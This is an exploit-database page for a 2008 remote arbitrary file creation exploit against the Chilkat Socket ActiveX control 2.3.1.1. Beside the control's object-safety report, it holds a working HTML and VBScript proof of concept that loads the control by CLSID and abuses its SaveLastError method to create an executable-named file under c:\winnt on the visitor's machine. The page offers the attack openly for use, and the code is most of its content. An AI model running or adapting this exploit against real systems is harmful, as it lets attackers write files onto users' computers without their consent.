[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chilkat Socket activex 2.3.1.1 Remote Arbitrary File Creation Exploit

Author
Zigma
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9305
Category
remote exploits
Date add
17-11-2008
Platform
unsorted
=====================================================================
Chilkat Socket activex 2.3.1.1 Remote Arbitrary File Creation Exploit
=====================================================================

<html>
<title>ChilkatSocket.DLL Arbitrary File Creation</title><br><br>
<body>
Company Name         : Chilkat Software, Inc.<br><br>
Vulnerable DLL       : ChilkatSocket.DLL<br><br>
DLL's version        : 2,3,1,1<br><br>
Object Safety Report : <br>
Report for Clsid: {474FCCCD-1B89-4D34-9E09-45807F23289C}<br>
RegKey Safe for Script: Faux<br>
RegKey Safe for Init: Faux<br>
Implements IObjectSafety: Vrai<br>
IDisp Safe:  Safe for untrusted: caller,data<br>  
IPersist Safe:  Safe for untrusted: caller,data <br> 
IPStorage Safe:  Safe for untrusted: caller,data  <br>
 
Exploit         : Arbitrary File Creation<br><br> 
Author          : Underz0ne Crew<br>
                  Zigma<br>
Homepage        : http://www.underz0ne.org<br><br>

<object classid='clsid:474FCCCD-1B89-4D34-9E09-45807F23289C' id='boom' ></object>
<script language='vbscript'>
arg1="c:\winnt\uz_.exe"
boom.SaveLastError arg1 
</script>
</body>
<html>



#  0day.today [2024-11-16]  #